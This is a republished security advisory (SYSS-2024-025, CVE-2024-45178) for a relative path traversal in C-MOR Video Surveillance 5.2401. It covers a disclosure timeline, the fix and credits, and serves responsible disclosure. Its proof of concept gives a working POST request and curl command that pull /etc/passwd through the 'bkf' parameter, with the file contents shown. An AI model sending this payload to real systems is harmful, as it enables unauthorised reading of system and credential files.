{"id":59511,"date":"2024-09-06T19:39:56","date_gmt":"2024-09-06T16:39:56","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181380\/SYSS-2024-025.txt"},"modified":"2024-09-06T19:39:56","modified_gmt":"2024-09-06T16:39:56","slug":"c-mor-video-surveillance-5-2401-path-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/c-mor-video-surveillance-5-2401-path-traversal\/","title":{"rendered":"C-MOR Video Surveillance 5.2401 Path Traversal"},"content":{"rendered":"<p>Advisory ID: SYSS-2024-025<br \/>Product: C-MOR Video Surveillance<br \/>Manufacturer: za-internet GmbH<br \/>Affected Version(s): 5.2401<br \/>Tested Version(s): 5.2401<br \/>Vulnerability Type: Relative Path Traversal (CWE-23)<br \/>Risk Level: High<br \/>Solution Status: Fixed<br \/>Manufacturer Notification: 2024-04-05<br \/>Solution Date: 2024-07-31<br \/>Public Disclosure: 2024-09-04<br \/>CVE Reference: CVE-2024-45178<br \/>Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br \/>and Matthias Deeg<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Overview:<\/p>\n<p>The software product C-MOR is an IP video surveillance system.<\/p>\n<p>The manufacturer describes the product as follows:<\/p>\n<p>&#8220;With C-MOR video surveillance, it is possible to check your<br \/>surveillance over network and the Internet. 
You can access the live<br \/>view as well as previous recordings from any PC or mobile device.<br \/>C-MOR is managed and controlled over the C-MOR web interface.<br \/>IP settings, camera recording setup, user rights and so on are set<br \/>over the web without the installation of any software on the<br \/>client.&#8221;[1]<\/p>\n<p>Due to improper user input validation, it is possible to download<br \/>arbitrary files from the C-MOR system via a path traversal attack.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Vulnerability Details:<\/p>\n<p>By analyzing the C-MOR web interface, it was found that different<br \/>functionalities are vulnerable to path traversal attacks, which is<br \/>due to insufficient user input validation.<\/p>\n<p>For instance, the download functionality for backups provided by the<br \/>script &#8220;download-bkf.pml&#8221; is vulnerable to a path traversal<br \/>attack via the parameter &#8220;bkf&#8221;.<\/p>\n<p>This enables an authenticated user to download arbitrary files as<br \/>Linux user &#8220;www-data&#8221; from the C-MOR system.<\/p>\n<p>Another path traversal attack is in the script &#8220;show-movies.pml&#8221;,<br \/>which can be exploited via the parameter &#8220;cam&#8221;.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Proof of Concept (PoC):<\/p>\n<p>Using the following HTTP POST request with the relative path<br \/>&#8220;..\/..\/..\/..\/etc\/passwd&#8221; as value for the parameter &#8220;bkf&#8221;, it is<br \/>possible to download the file &#8220;\/etc\/passwd&#8221;:<\/p>\n<p>POST \/download-bkf.pml HTTP\/1.1<br \/>Host: &lt;HOST&gt;<br \/>Authorization: Basic &lt;CREDENTIALS&gt;<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 26<\/p>\n<p>bkf=..\/..\/..\/..\/etc\/passwd<\/p>\n<p>An example of a successful path traversal attack is demonstrated via<br \/>the following curl command:<\/p>\n<p>$ curl -X 
POST -d 'bkf=..\/..\/..\/..\/etc\/passwd' --user \\<br \/>'&lt;USERNAME&gt;:&lt;PASSWORD&gt;' --ciphers 'DEFAULT:!DH' \\<br \/>https:\/\/&lt;HOST&gt;\/download-bkf.pml<br \/>root:x:0:0:root:\/root:\/bin\/bash<br \/>daemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh<br \/>bin:x:2:2:bin:\/bin:\/bin\/sh<br \/>sys:x:3:3:sys:\/dev:\/bin\/sh<br \/>sync:x:4:65534:sync:\/bin:\/bin\/sync<br \/>games:x:5:60:games:\/usr\/games:\/bin\/sh<br \/>man:x:6:12:man:\/var\/cache\/man:\/bin\/sh<br \/>lp:x:7:7:lp:\/var\/spool\/lpd:\/bin\/sh<br \/>mail:x:8:8:mail:\/var\/mail:\/bin\/sh<br \/>news:x:9:9:news:\/var\/spool\/news:\/bin\/sh<br \/>uucp:x:10:10:uucp:\/var\/spool\/uucp:\/bin\/sh<br \/>proxy:x:13:13:proxy:\/bin:\/bin\/sh<br \/>www-data:x:33:33:www-data:\/var\/www:\/bin\/sh<br \/>backup:x:34:34:backup:\/var\/backups:\/bin\/sh<br \/>list:x:38:38:Mailing List Manager:\/var\/list:\/bin\/sh<br \/>irc:x:39:39:ircd:\/var\/run\/ircd:\/bin\/sh<br \/>gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/bin\/sh<br \/>nobody:x:65534:65534:nobody:\/nonexistent:\/bin\/sh<br \/>libuuid:x:100:101::\/var\/lib\/libuuid:\/bin\/sh<br \/>Debian-exim:x:101:103::\/var\/spool\/exim4:\/bin\/false<br \/>statd:x:102:65534::\/var\/lib\/nfs:\/bin\/false<br \/>sshd:x:103:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin<br \/>cam:x:1000:1000:Cam,,,:\/home\/cam:\/bin\/bash<br \/>postfix:x:104:107::\/var\/spool\/postfix:\/bin\/false<br \/>stunnel4:x:105:109::\/var\/run\/stunnel4:\/bin\/false<br \/>mysql:x:106:110:MySQL Server,,,:\/var\/lib\/mysql:\/bin\/false<br \/>messagebus:x:107:113::\/var\/run\/dbus:\/bin\/false<br \/>ntp:x:108:114::\/home\/ntp:\/bin\/false<br \/>download:x:1002:1002:Download User:\/home\/download:\/bin\/bash<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Solution:<\/p>\n<p>Install C-MOR Video Surveillance version 
6.00PL1.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Disclosure Timeline:<\/p>\n<p>2024-04-05: Vulnerability reported to manufacturer<br \/>2024-04-05: Manufacturer acknowledges receipt of security advisories<br \/>2024-04-08: Exchange regarding security updates and disclosure timeline<br \/>2024-05-08: Further exchange concerning security updates and disclosure<br \/>timeline; public release of all security advisories<br \/>scheduled for release of C-MOR Video Surveillance version 6<br \/>2024-05-10: Release of C-MOR software version 5.30 with security updates<br \/>for some reported security issues<br \/>2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br \/>Video Surveillance version 6; response with planned<br \/>release date of 2024-08-01<br \/>2024-07-30: E-mail from manufacturer with further information<br \/>concerning security fixes<br \/>2024-07-31: Release of C-MOR software version 6.00PL1<br \/>2024-09-04: Public release of security advisory<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>References:<\/p>\n<p>[1] Product website for C-MOR Video Surveillance<br \/>https:\/\/www.c-mor.com\/<br \/>[2] SySS Security Advisory SYSS-2024-025<br \/>https:\/\/www.syss.de\/fileadmin\/dokumente\/Publikationen\/Advisories\/SYSS-2024-025.txt<br \/>[3] SySS Responsible Disclosure Policy<br \/>https:\/\/www.syss.de\/en\/responsible-disclosure-policy\/<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Credits:<\/p>\n<p>This security vulnerability was found by Chris Beiter, Frederik<br \/>Beimgraben, and Matthias Deeg.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Disclaimer:<\/p>\n<p>The information provided in this security advisory is provided &#8220;as is&#8221;<br \/>and without warranty of any kind. 
Details of this security advisory may<br \/>be updated in order to provide as accurate information as possible. The<br \/>latest version of this security advisory is available on the SySS Web<br \/>site.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Copyright:<\/p>\n<p>Creative Commons &#8211; Attribution (by) &#8211; Version 3.0<br \/>URL: http:\/\/creativecommons.org\/licenses\/by\/3.0\/deed.en<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59511","post","type-post","status-publish","format-standard","hentry","category-vulnerability"]}